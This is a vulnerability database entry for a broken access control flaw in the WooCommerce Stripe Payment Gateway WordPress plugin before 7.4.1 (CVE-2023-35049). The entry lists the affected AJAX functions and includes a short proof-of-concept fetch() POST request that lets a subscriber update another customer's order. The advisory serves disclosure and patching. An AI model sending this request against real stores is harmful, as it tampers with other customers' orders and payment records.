Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:BDE23A65-476D-411B-A0D3-F2B9D7112C01
HistoryJun 26, 2023 - 12:00 a.m.

WooCommerce Stripe Payment Gateway < 7.4.1 - Subscriber+ Order Intent Update

2023-06-2600:00:00
wpvulndb
66
woocommerce
stripe payment gateway
ajax functions
subscriber
security exploit

0.0004 Low

EPSS

Percentile

9.1%

JSON

The plugin does not properly restrict users from making a certain set of changes to other customers’ orders. TODO: ADD link to Patchstack’s post instead of H1

Affected functions:
create_payment_intent_ajax
update_payment_intent_ajax
save_upe_appearance_ajax
update_order_status_ajax
update_failed_order_ajax

As a subscriber, go to the cart page (ie https://example/cart/) and grab the updateFailedOrderNonce nonce, then perform the below request (42 being a Completed Order ID)

fetch("/cart/?wc-ajax=wc_stripe_update_failed_order", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'order_id=42&_wpnonce=NONCE&intent_id=1',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Related

cvelist 1
cve 1
wpvulndb 1
nvd 1
cvelist
cvelist
CVE-2023-35049 WordPress WooCommerce Stripe Payment Gateway plugin <= 7.4.0 - Unauthenticated Broken Access Control vulnerability
2024-06-19 12:26:52
cve
cve
CVE-2023-35049
2024-06-19 13:15:52
wpvulndb
wpvulndb
WooCommerce Stripe Payment Gateway < 7.4.1 - Subscriber+ Order Intent Update
2023-06-26 00:00:00
nvd
nvd
CVE-2023-35049
2024-06-19 13:15:52

0.0004 Low

EPSS

Percentile

9.1%

JSON
Related for WPEX-ID:BDE23A65-476D-411B-A0D3-F2B9D7112C01
cvelist1cve1wpvulndb1nvd1